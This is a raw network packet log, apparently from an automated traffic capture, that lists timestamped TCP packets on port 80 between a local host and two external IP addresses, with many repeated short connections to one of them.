                                                    Nov 20, 2024 11:08:10.073853970 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.073865891 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.073875904 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.073888063 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.073895931 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.073906898 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.073937893 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.074074984 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.125508070 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.125519991 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.125530958 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.125540972 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.125551939 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.125566959 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.125603914 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.125603914 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.125634909 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.125684023 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.126915932 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.126926899 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.126935959 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.126948118 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.126957893 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.126967907 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.126969099 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.126976967 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.126987934 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.126991987 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.126991987 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.127027988 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.127027988 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.127027988 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.128387928 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.128400087 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.128408909 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.128418922 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:10.128446102 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:10.128475904 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:14.319026947 CET804916466.63.187.231192.168.2.22
                                                    Nov 20, 2024 11:08:14.319103956 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:17.074093103 CET4916580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:17.079133034 CET804916594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:17.079204082 CET4916580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:17.118997097 CET4916580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:17.124013901 CET804916594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:17.124070883 CET4916580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:17.128927946 CET804916594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:17.823625088 CET804916594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:17.823703051 CET804916594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:17.823730946 CET4916580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:17.823797941 CET4916580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:17.831146955 CET804916594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:17.916186094 CET4916480192.168.2.2266.63.187.231
                                                    Nov 20, 2024 11:08:17.921952963 CET4916680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:17.927031040 CET804916694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:17.927090883 CET4916680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:17.928706884 CET4916680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:17.934088945 CET804916694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:17.934139013 CET4916680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:17.939181089 CET804916694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:18.691222906 CET804916694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:18.691303968 CET804916694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:18.691489935 CET4916680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:18.693272114 CET4916680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:18.698165894 CET804916694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:18.829866886 CET4916780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:18.834971905 CET804916794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:18.837064028 CET4916780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:18.838438034 CET4916780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:18.845565081 CET804916794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:18.846126080 CET4916780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:18.853193045 CET804916794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:19.578393936 CET804916794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:19.578412056 CET804916794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:19.578538895 CET4916780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:19.578538895 CET4916780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:19.583566904 CET804916794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:19.717892885 CET4916880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:19.727780104 CET804916894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:19.727868080 CET4916880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:19.729424000 CET4916880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:19.737112999 CET804916894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:19.737168074 CET4916880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:19.745429039 CET804916894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:20.483329058 CET804916894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:20.483433962 CET804916894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:20.483470917 CET4916880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:20.483509064 CET4916880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:20.491621971 CET804916894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:20.627528906 CET4916980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:20.634664059 CET804916994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:20.637061119 CET4916980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:20.639606953 CET4916980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:20.648837090 CET804916994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:20.648932934 CET4916980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:20.653995991 CET804916994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:21.399564981 CET804916994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:21.399610996 CET804916994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:21.399796009 CET4916980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:21.399873972 CET4916980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:21.404863119 CET804916994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:21.547736883 CET4917080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:21.553889990 CET804917094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:21.554084063 CET4917080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:21.556432962 CET4917080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:21.561351061 CET804917094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:21.561434984 CET4917080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:21.566390991 CET804917094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:22.424345016 CET804917094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:22.424449921 CET804917094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:22.424479008 CET4917080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:22.424519062 CET4917080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:22.431804895 CET804917094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:22.568690062 CET4917180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:22.577080011 CET804917194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:22.577214956 CET4917180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:22.579590082 CET4917180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:22.587671995 CET804917194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:22.587776899 CET4917180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:22.595927954 CET804917194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:23.353054047 CET804917194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:23.353432894 CET804917194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:23.353502035 CET4917180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:23.377943993 CET4917180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:23.382906914 CET804917194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:23.726896048 CET4917280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:23.731878042 CET804917294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:23.731954098 CET4917280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:23.780766964 CET4917280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:23.789789915 CET804917294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:23.789921999 CET4917280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:23.798429012 CET804917294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:24.467380047 CET804917294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:24.467458010 CET804917294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:24.467559099 CET4917280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:24.477710962 CET4917280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:24.482563019 CET804917294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:24.617825031 CET4917380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:24.622915983 CET804917394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:24.622975111 CET4917380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:24.624708891 CET4917380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:24.629558086 CET804917394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:24.629606962 CET4917380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:24.634493113 CET804917394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:25.379029989 CET804917394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:25.379147053 CET4917380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:25.379538059 CET804917394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:25.379591942 CET4917380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:25.387665987 CET804917394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:25.531311035 CET4917480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:25.539854050 CET804917494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:25.539956093 CET4917480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:25.542303085 CET4917480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:25.550194025 CET804917494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:25.550254107 CET4917480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:25.558141947 CET804917494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:26.297723055 CET804917494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:26.297823906 CET804917494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:26.297900915 CET4917480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:26.297955036 CET4917480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:26.303596973 CET804917494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:26.439129114 CET4917580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:26.444135904 CET804917594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:26.444210052 CET4917580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:26.446536064 CET4917580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:26.451474905 CET804917594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:26.451548100 CET4917580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:26.456537962 CET804917594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:27.189125061 CET804917594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:27.189162970 CET804917594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:27.189210892 CET4917580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:27.189269066 CET4917580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:27.194081068 CET804917594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:27.330475092 CET4917680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:27.335623026 CET804917694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:27.335701942 CET4917680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:27.337290049 CET4917680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:27.342113018 CET804917694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:27.342170000 CET4917680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:27.346992970 CET804917694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:28.082808018 CET804917694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:28.082896948 CET804917694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:28.082947016 CET4917680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:28.089917898 CET4917680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:28.097656012 CET804917694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:28.278701067 CET4917780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:28.283813000 CET804917794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:28.283921003 CET4917780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:28.285974979 CET4917780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:28.290896893 CET804917794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:28.290956020 CET4917780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:28.295836926 CET804917794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:29.023233891 CET804917794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:29.023385048 CET804917794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:29.023498058 CET4917780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:29.023539066 CET4917780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:29.028326988 CET804917794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:29.150775909 CET4917880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:29.155848980 CET804917894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:29.155926943 CET4917880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:29.157368898 CET4917880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:29.162221909 CET804917894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:29.162280083 CET4917880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:29.167200089 CET804917894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:29.900144100 CET804917894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:29.900217056 CET804917894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:29.900412083 CET4917880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:29.900412083 CET4917880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:29.907681942 CET804917894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:30.038975000 CET4917980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:30.047132969 CET804917994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:30.047209978 CET4917980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:30.048729897 CET4917980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:30.056602955 CET804917994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:30.056655884 CET4917980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:30.064990997 CET804917994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:30.800529003 CET804917994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:30.800551891 CET804917994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:30.800621033 CET4917980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:30.801029921 CET4917980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:30.805866957 CET804917994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:30.930908918 CET4918080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:30.935977936 CET804918094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:30.936216116 CET4918080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:30.937805891 CET4918080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:30.942784071 CET804918094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:30.942888975 CET4918080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:30.952702045 CET804918094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:31.709690094 CET804918094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:31.709810972 CET804918094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:31.709835052 CET4918080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:31.709991932 CET4918080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:31.714780092 CET804918094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:31.849154949 CET4918180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:31.855371952 CET804918194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:31.855441093 CET4918180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:31.856868982 CET4918180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:31.861879110 CET804918194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:31.861943960 CET4918180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:31.869574070 CET804918194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:32.666455984 CET804918194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:32.666646004 CET804918194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:32.666765928 CET4918180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:32.666765928 CET4918180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:32.675344944 CET804918194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:32.800539970 CET4918280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:32.807260990 CET804918294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:32.807336092 CET4918280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:32.808886051 CET4918280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:32.814765930 CET804918294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:32.814811945 CET4918280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:32.820162058 CET804918294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:33.577142954 CET804918294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:33.577224970 CET804918294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:33.577250957 CET4918280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:33.577292919 CET4918280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:33.582195044 CET804918294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:33.707895994 CET4918380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:33.716399908 CET804918394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:33.716459990 CET4918380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:33.718036890 CET4918380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:33.725684881 CET804918394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:33.725738049 CET4918380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:33.730770111 CET804918394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:34.478512049 CET804918394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:34.478538036 CET804918394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:34.478832006 CET4918380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:34.478832006 CET4918380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:34.487728119 CET804918394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:34.610810995 CET4918480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:34.621398926 CET804918494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:34.621468067 CET4918480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:34.623150110 CET4918480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:34.631797075 CET804918494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:34.631910086 CET4918480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:34.640237093 CET804918494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:35.458312035 CET804918494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:35.458405972 CET804918494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:35.458425045 CET4918480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:35.458456039 CET4918480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:35.465753078 CET804918494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:35.592593908 CET4918580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:35.600970984 CET804918594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:35.601061106 CET4918580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:35.602694035 CET4918580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:35.612519979 CET804918594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:35.612588882 CET4918580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:35.620742083 CET804918594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:36.517483950 CET804918594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:36.517503977 CET804918594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:36.517513037 CET804918594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:36.517608881 CET4918580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:36.517647028 CET4918580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:36.527085066 CET804918594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:36.654627085 CET4918680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:36.659647942 CET804918694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:36.659735918 CET4918680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:36.661369085 CET4918680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:36.666235924 CET804918694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:36.666299105 CET4918680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:36.671251059 CET804918694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:37.408440113 CET804918694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:37.408489943 CET804918694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:37.408603907 CET4918680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:37.408665895 CET4918680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:37.416956902 CET804918694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:37.584533930 CET4918780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:37.591386080 CET804918794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:37.591473103 CET4918780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:37.593621016 CET4918780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:37.600326061 CET804918794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:37.600393057 CET4918780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:37.605334997 CET804918794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:38.490098000 CET804918794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:38.490138054 CET804918794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:38.490185022 CET4918780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:38.490185022 CET4918780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:38.495121002 CET804918794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:38.838131905 CET4918880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:38.846317053 CET804918894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:38.846386909 CET4918880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:38.847771883 CET4918880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:38.858000994 CET804918894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:38.858062029 CET4918880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:38.865154028 CET804918894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:39.674951077 CET804918894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:39.675000906 CET804918894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:39.675087929 CET4918880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:39.675087929 CET4918880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:39.680093050 CET804918894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:39.804893017 CET4918980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:39.810023069 CET804918994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:39.810105085 CET4918980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:39.811527014 CET4918980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:39.816407919 CET804918994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:39.816478014 CET4918980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:39.821403980 CET804918994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:40.550285101 CET804918994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:40.550409079 CET4918980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:40.550492048 CET804918994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:40.550548077 CET4918980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:40.555349112 CET804918994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:08:40.678649902 CET4919080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:08:40.684436083 CET804919094.156.177.41192.168.2.22
